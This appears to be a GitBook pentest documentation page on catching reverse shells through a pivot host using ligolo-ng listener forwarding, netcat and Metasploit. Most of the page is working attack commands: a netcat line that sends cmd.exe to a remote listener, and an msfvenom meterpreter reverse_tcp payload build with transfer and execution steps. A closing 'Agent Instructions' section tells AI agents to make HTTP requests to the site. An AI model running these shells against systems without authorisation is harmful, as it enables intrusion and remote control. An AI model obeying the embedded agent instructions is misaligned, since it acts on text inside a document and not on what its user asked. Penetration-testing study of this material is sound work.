# Setup Reverse Shells through Pivot Here's how you can set up a netcat listener and pivot connections using **Netcat** and **Metasploit**: *** #### **Step 1: Set Up the Netcat Listener** First, you need to set up a **Netcat** listener on your local machine (Kali) to accept incoming connections. 1. **Start Netcat Listener**: ```bash nc -nvlp 2222 ``` This command will listen on **port 2222** on your local machine. *** #### **Step 2: Set Up the Listener Add Command** Now, configure the listener to forward any incoming connections on a different port (e.g., port 1234) to your local machine's port 2222. 1. **Listener Add Command**: ```bash listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:2222 ``` * This command tells the listener to forward any incoming connections that hit **port 1234** on your **pivot machine** to your **localhost (127.0.0.1)** on **port 2222**. You should see a message confirming the listener is set up and active. *** #### **Step 3: Verify the Listener is Active** You can check if the listener is active by running the following command: 1. **Check Active Listeners**: ```bash listener_list ``` This will show you the listeners that are currently active. You should see the listener set up in the previous step. *** #### **Step 4: Testing the Listener with Netcat** Now, to test that the listener works, you can attempt a connection from a remote machine (e.g., **client01**) using **Netcat**: 1. **Connect Back to Listener on your pivot machine**: On **the pivot machine,** use the following Netcat command to connect back to your machine on **port 1234**, which will forward the traffic to **localhost:2222**. ```bash nc.exe -nv 10.10.120.131 1234 -e cmd.exe ``` * `10.10.120.131` is the IP address of your pivot machine. * Port `1234` is where the traffic will be forwarded to **localhost:2222**. * The `-e cmd.exe` option will execute the **cmd.exe** on the target machine, providing you with a shell. *** #### **Step 5: Using Metasploit for Reverse Shell** To automate this process or use a reverse shell, you can use **Metasploit** to generate a payload that will connect back to your pivot machine's IP. 1. **Generate a Reverse Shell with Metasploit**: ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.76.14 LPORT=1234 -f exe -o shell2.exe ``` * `LHOST=172.16.76.14` is the IP address of your pivot machine. * `LPORT=1234` is the port you're forwarding traffic to. * `-o shell2.exe` specifies the output filename. 2. **Execute the Payload**: After transferring and executing **shell2.exe** on the target machine, it will establish a reverse shell connection back to your listener on **port 1234**, which is forwarded to **localhost:2222**. *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://zero-day-archives.gitbook.io/zero-day-archives/network-pivoting-port-forwarding-and-tunneling/pivoting/ligolo-ng/setup-reverse-shells-through-pivot.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.